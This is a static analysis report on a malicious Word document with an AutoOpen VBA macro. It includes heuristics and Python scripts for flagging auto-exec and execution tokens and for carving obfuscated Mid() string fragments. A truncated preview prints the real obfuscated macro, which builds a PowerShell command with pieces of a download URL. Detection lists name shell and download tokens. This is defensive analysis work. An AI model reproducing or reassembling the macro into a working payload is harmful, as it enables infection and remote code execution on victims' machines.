Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 39b2086693d30edc…

MALICIOUS

Office (OLE)

Size: 137.5 KB
Created: 2018-02-08 19:39:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: dbe2c640ac994244da9351d0c63fae67
SHA-1: 5e56463f00fd4d17e20c478451fc5f745f89e8b1
SHA-256: 39b2086693d30edc0e4c8e01f069d17da997945269a72fd2812ca0aca5b406ee
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Word document containing a VBA macro with an AutoOpen entry point, which Word runs as soon as the document is opened with macros enabled. The macro calls Shell(), indicating an attempt to execute an external command. In the recovered source, AutoOpen hands control to Application.Run with a string callee and the result of the function uIGzqUruab(), which assembles a string from Mid() substrings of padded literals; the visible fragments carry PowerShell-style syntax ([chAR]nn character sums, -CrEplaCE, '+' concatenation), consistent with a PowerShell command line being built at runtime. The ClamAV detection Doc.Trojan.Obfuscated-6444812-0 supports the verdict. Because the VBA is heavily obfuscated (random identifiers, junk arithmetic on undefined variables under On Error Resume Next) and carries no family-specific marker, the sample is classified as 'unknown family'.

Heuristics (7)

  • ClamAV: Doc.Trojan.Obfuscated-6444812-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Obfuscated-6444812-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    The macro calls Shell(), which starts an external program or command line.
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    The macro defines AutoOpen, which Word runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not match this sample: a VBA project was recovered (see macros.bas under extracted artifacts), so here the marker is redundant with the AutoOpen finding above rather than evidence of a WordBasic-only document.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier present in ordinary Office files and is not an indicator by itself.
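The AutoOpen, Shell() and p-code heuristics above all reduce to the same question: does the recovered VBA contain an auto-execution entry point together with tokens that execute something? The following is an added example of that triage, written for this report and not the analysis platform's own rule set; the token lists are the author's assumptions. It also lists string callees handed to Application.Run, the indirect-call pattern seen in this sample's AutoOpen, because the real callee is then a name that may not appear in the recovered source.

```python
"""Token triage of recovered VBA source, in the spirit of the OLE_VBA_AUTOOPEN,
OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics in this report.

Added example, not the analysis platform's code.  The token lists below are the
author's own assumptions, not the platform's rule set.
"""
import re

# Entry points Word/Excel run on open/close once macros are enabled.
AUTOEXEC_TOKENS = (
    "AutoOpen", "AutoExec", "AutoClose", "AutoNew", "AutoExit",
    "Document_Open", "Document_Close", "Workbook_Open", "Auto_Open",
)
# Tokens that spawn a process, instantiate a COM object, fetch content,
# or call another routine indirectly (so the real callee is hidden).
EXEC_TOKENS = (
    "Shell", "WScript.Shell", "CreateObject", "Application.Run",
    "CallByName", "URLDownloadToFile", "powershell", "cmd.exe",
)


def _present(token, source):
    # The token must stand alone: not preceded by an identifier char or a dot,
    # not followed by an identifier char.  "Shell" thus does not match
    # "powershell" or the ".Shell" of "WScript.Shell".
    pat = r"(?<![\w.])" + re.escape(token) + r"(?![\w])"
    return re.search(pat, source, re.IGNORECASE) is not None


def indirect_callees(source):
    """Names passed as string literals to Application.Run."""
    return re.findall(r'Application\.Run\s+"([^"]+)"', source, re.IGNORECASE)


def scan_vba(source):
    """Return the auto-exec and execution tokens found plus a severity label."""
    auto = [t for t in AUTOEXEC_TOKENS if _present(t, source)]
    execs = [t for t in EXEC_TOKENS if _present(t, source)]
    if auto and execs:
        severity = "critical"   # runs on open AND executes something
    elif execs:
        severity = "high"       # executes something, but needs a trigger
    elif auto:
        severity = "medium"     # runs on open, nothing obviously executed
    else:
        severity = "info"
    return {"autoexec": auto, "exec": execs,
            "indirect": indirect_callees(source), "severity": severity}


# Constructed module in the shape of the extracted macro (junk arithmetic,
# On Error Resume Next, Application.Run with a string callee and a function
# argument); this is not the sample's real code.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Sub AutoOpen()
On Error Resume Next
OlPKSiSrF = PARHSwbwtFunJN - TKtiHSfGRk / (5257924 + jXnGCKrFlh - 3668501 + wmzdKza)
Application.Run "hiddenProc", buildPayload
End Sub
Function buildPayload()
On Error Resume Next
buildPayload = Shell("cmd.exe /c whoami", 0)
End Function
'''

# Constructed benign module: auto-exec entry point, nothing executed.
BENIGN_VBA = '''Sub Document_Open()
MsgBox "Welcome"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(name, scan_vba(src))
```

The severity ladder mirrors the report's own ratings (AutoOpen alone high/medium, Shell() critical): an auto-exec entry point is only interesting when something is executed from it, and an execution token without a trigger still deserves a look. Run it over every module olevba extracts, not just the one that holds AutoOpen, since the callee of Application.Run may live elsewhere or, as here, be named by a string that the recovered source never defines.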

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26841 bytes
SHA-256: 143bb2e824fdbc37e257b0649722ca6f103249bd509ede6fa73155a703931f9f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GLqQfiWzQnjpPa"
Sub AutoOpen()
On Error Resume Next
OlPKSiSrF = PARHSwbwtFunJN - TKtiHSfGRk / (5257924 + jXnGCKrFlh - 3668501 + wmzdKza)
cBqwTZJzd = uzXrbvbGwsdR - jmrqjVTC / (9223729 + JzTpZThsM - 2804163 + qhvKXqYXLG)
zKsHLciZb = jwjOsHFB - RzQDmsEvjLiu / (5945821 + MLpaiNrwTkEo - 8473552 + hSQlWlu)
Application.Run "oFdnJbKACY", uIGzqUruab
GhHGOGhCN = PCOUCDjXnvSjfw - ADNOvtXtqFihUT / (1359598 + wFnomdhf - 2860340 + OiqbaBIIODUn)
SDrIYOYVL = jlVasJL - VizLfoDOid / (4921190 + EDpInkzi - 1118327 + HtYKBEGAJ)
End Sub
Function uIGzqUruab()
On Error Resume Next
qfozu = SaHGszCPi - jwmNkTwwwiTH / (6619927 + jbTzXLjw - 2765336 + olobhOLTEVhzir)
GwiioBLTXsB = pzqCrtKrwaRjF - XAmjqZzfVQiXz / (571138 + aitbDiNs - 8922248 + CdtqBQhFbh)
rqzUTOSLD = vOrStJcaTU - HfXrYEBKKHsNov / (1134777 + TABRYVrfUBJJY - 7052993 + aBIWOSJrc)
dfabMmDmN = vUFiIuozZ + Mid(("zwiVBdvSoUCvRGzuZvVZLjjQL+'+'C7DWC7D+C7DUwqWC'+'7D+gSj+gSjC7DgSj+gSjU+qWC7D+C7DU'+'-obgSj+gSjjeC7D+C7DctChPGW"), 26, 80)
JHrYf = UIZRDVlorWXvr - ZoRLjYrWJIYM / (1306498 + dcTzmVDbsJwmka - 5151242 + UhMjzZlpXwwww)
aLjXTWIU = tqOnKOCaJ - hzvINtoRvW / (7625484 + zaBEriZnZFdaQ - 1381214 + zPLkuYqwAd)
KWcpjFlpl = ciKfCciBrnm - XYAVwcUU / (8475852 + VrBjmtT - 1788578 + AaNBvdtCAwO)
iHvmXprw = RXNCBDX + Mid(("CahBjPSkXaMYYIHLqDqfZZbWwiC7gS'Bai"), 27, 5)
BpQYschvB = IlWISdTqkih - lfKXErDa / (3725253 + dpljsvazQP - 1414957 + SbinKQjKLj)
smdQiJw = YZcdopLquMkI - WmkXPlRSDQNi / (8548286 + hmrIMzHNG - 3037580 + mJFYMIhTw)
DRZikAkj = XfLvZPQUJ - uvYiDCEYL / (4867194 + jVFdcLtr - 1515550 + PuAJHjMmhrs)
NNPzDfo = jLIoLuCtV + Mid(("lJZVuRZBvzwrPlkBjTrGkjiYlskcwShnKIc7DreC7D+C7DachR9'+'m+R9m(TC7D+C7DMC7DrIi"), 36, 37)
RbAujb = SzDWdBj - BXUwWrldiRj / (3973929 + mrkYhDWGVuSz - 5001664 + piUPvRroNGYmNX)
nwYQdkPUT = qpHpXfFTwvw - ZjdCwwwww / (2619551 + oDqzidz - 8950733 + waiEKICPjLVTz)
hfjCbflA = SIjEaqQ - jdnTlhhaqzB / (1505831 + wBYrquhNn - 8419708 + rzYouZYEZXuB)
YpqXOi = AXqkbVJEJIYGrK + Mid(("GYXvaToNhVaTkatpC7D+C7D://wC7D+C7DwC7D+C7Dw.sulC7D+C7DgSjR9m+R9m+gR9'+'StWKSlS"), 15, 57)
wsXVcqjwjAZ = THKMkvjNtlFcl - tjQawirE / (9959854 + ATaAESVQ - 286273 + EhjMoJqJ)
uTYpIc = QLPkLnc - vVHzPHC / (2314344 + ViIbQpaaE - 2325889 + EmnshDjwkiOMcN)
zkGlL = uuNoZjAWnH - YzWpKHb / (6217766 + JhOPMYG - 5270923 + HWjNqujMPmPD)
acoVNYb = rWUhIVWSp + Mid(("lzNiTjzkLD+C7DDC7D+C7DCX){trgSj+gSjyC7D+C7D{TC7D+C7DR9m+R9'+'mM1YYUC7DgSj+g'+'Sj+C7D.6MC7D+C7DqDotR9m+R9mC7D+C7DRlWnC7jGrawwjSTklnSZhDSYPCNZZ"), 10, 109)
QmljTrHdHC = vNPNfwcBaZoj - ULJbIzroRwth / (5793817 + hojfKAlkzahA - 2835600 + loibTzMTawma)
jawWSocV = viRWfBPvM - tdfzjLiuIiFDcS / (3562785 + iWNOitjmp - 1165967 + EBzzrZvkznAd)
zSqjwX = sDisJsCw - RWshwLA / (8941066 + JdcdsIjNdhiVa - 5743511 + FViOrczDkBkcG)
HMQGNJKqtp = AkjijavYG + Mid(("oKNHmjGI[chAR]39) ) SVjKK"), 9, 12)
jXpUvAt = LWJvOVQir - zccjlDQMZsbIf / (5419355 + CzzSfmt - 5116209 + TshjiiT)
EKYMiw = tjHhwCwzi - amnCqhrMXSQ / (2219894 + GBWNtVj - 5738935 + ZIOwUWEvzSBHT)
pjQwYpHQo = SQCAoVKAChdBj - pEduBiNfntM / (4150557 + cTzJwmND - 9359071 + UuHjYFhTTqcFu)
BAWjbuzNCw = bjkCurzf + Mid(("QpOtEEd7D?httR9m+R9m'+'pC'+'7D+C7D:/gSj+gSjC7D+C7D/grC7D+C7DuC7D+CgSj+gSR9m+R9mj7DpC7D'+'+C7Do-CR9m+R9m7'+'D+C7DvC7D+C'+'7Diva.coC7D+C7DmgSj+gSj/C7D+C7DhC7'+'D+gSj+lchdsqhsvlKAz"), 8, 157)
jtqhmTzRSB = iOSYsNIztB - ZGasffWYICrCm / (3016476 + jjbtwqAJoF - 4512822 + NhfHNil)
FwjaGA = WhvoiLJwV - LjIYdcYzDzZzm / (7487199 + bJqdudTB - 284651 + BknLnjDoAtruoD)
katRP = jOfmoYv - jGBTTaJr / (5967233 + acrknQSV - 1729519 + tQjVmZLPoOMY)
kLELqCiUn = HGkancIoTNihF + Mid(("wZafKSqolKUzmEjvdiRiVUv[chAR]98+[chAR]80),[chAR]124-CrEplaCE ([chAR]82+[chAR]57+[chAR]109),zRvHbNLXUL"), 24, 68)
wrULasLquzT = CMnNbLwaPTTPK - PZjhtOuDQ / (8991606 + WQdjiFl - 9045253 + qEtIKONoZvtJvL)
LHSFwND
... (truncated)
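Every meaningful line in the preview above has the form `x = y + Mid(("<padded literal>"), start, length)`, with the junk arithmetic between them evaluating to nothing under On Error Resume Next; the substrings, read in source order, form the real string that AutoOpen passes on. The following is an added example of carving those fragments, written for this report and not part of the analysis tooling. The sample module and the Q7Z token are constructed; in the real macro the tokens C7D, gSj and R9m are placeholders that the embedded PowerShell replaces itself (the fragment `-CrEplaCE ([chAR]82+[chAR]57+[chAR]109)` resolves to `-CrEplaCE (R9m)`, and `[chAR]39` is the apostrophe), so their replacement characters must be read from the full macro rather than guessed.

```python
"""Carve the string fragments hidden in Mid() calls of an obfuscated VBA macro.

Added example for this report, not part of the analysis tooling.  It follows
the shape of the macros.bas preview: junk arithmetic under On Error Resume
Next, interleaved with `x = y + Mid(("<padded literal>"), start, length)`
lines whose substrings, in source order, form the real string.  The sample
input and the Q7Z substitution are constructed; for the real sample the
replacement of C7D/gSj/R9m must come from the macro's own -CrEplaCE calls.
"""
import re

# Mid((" literal "), start, length).  The literal may contain ' and + (the
# PowerShell concatenation that survives into the payload) but no bare ".
MID_RE = re.compile(
    r'Mid\(\(\s*"((?:[^"]|"")*)"\s*\)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)',
    re.IGNORECASE,
)
# [chAR]73+[chAR]69+[chAR]88 -> "IEX"  (PowerShell char-sum obfuscation)
CHAR_SUM_RE = re.compile(r"\[chAR\]\d+(?:\s*\+\s*\[chAR\]\d+)*", re.IGNORECASE)


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, at most `length` characters."""
    if start < 1:
        raise ValueError("VBA Mid() start is 1-based")
    return s[start - 1:start - 1 + length]


def carve_mid_fragments(vba_source):
    """Substrings selected by each Mid() call, in source order."""
    frags = []
    for m in MID_RE.finditer(vba_source):
        literal = m.group(1).replace('""', '"')   # VBA doubles " inside literals
        frags.append(vba_mid(literal, int(m.group(2)), int(m.group(3))))
    return frags


def resolve_char_sums(s):
    """Replace [chAR]n+[chAR]m... runs with the characters they spell."""
    def repl(m):
        codes = re.findall(r"\[chAR\](\d+)", m.group(0), re.IGNORECASE)
        return "".join(chr(int(c)) for c in codes)
    return CHAR_SUM_RE.sub(repl, s)


def reassemble(vba_source, substitutions=None):
    """Join the carved fragments, apply analyst-supplied token substitutions,
    then resolve [chAR] sums.  Returns the recovered command string."""
    s = "".join(carve_mid_fragments(vba_source))
    for token, replacement in (substitutions or {}).items():
        s = s.replace(token, replacement)
    return resolve_char_sums(s)


# Constructed module in the same shape as the preview; Q7Z plays the role
# that C7D/gSj/R9m play in the real macro (a placeholder for a quote).
SAMPLE_VBA = '''Sub AutoOpen()
On Error Resume Next
OlPKSiSrF = PARHSwbwtFunJN - TKtiHSfGRk / (5257924 + jXnGCKrFlh - 3668501 + wmzdKza)
dfabMmDmN = vUFiIuozZ + Mid(("XXXXXXXXXXpowershQ7Z+Q7Zell -w hidXXXX"), 11, 24)
cBqwTZJzd = uzXrbvbGwsdR - jmrqjVTC / (9223729 + JzTpZThsM - 2804163 + qhvKXqYXLG)
iHvmXprw = RXNCBDX + Mid(("abcdeden -c [chAR]73+[chAR]69+[chAR]88 Q7ZhelloQ7Z zzz"), 6, 45)
End Sub
'''

if __name__ == "__main__":
    print(carve_mid_fragments(SAMPLE_VBA))
    print(reassemble(SAMPLE_VBA, {"Q7Z": "'"}))
```

Run `carve_mid_fragments` over the full macros.bas first and inspect the joined string before choosing substitutions: the recovered text is still a PowerShell command line with its own quoting and -CrEplaCE steps, so the VBA layer gives you the command as handed to the interpreter, not the final URL or script. Resolving the `[chAR]` sums is safe at this layer because they are plain character arithmetic; everything else belongs to the PowerShell stage.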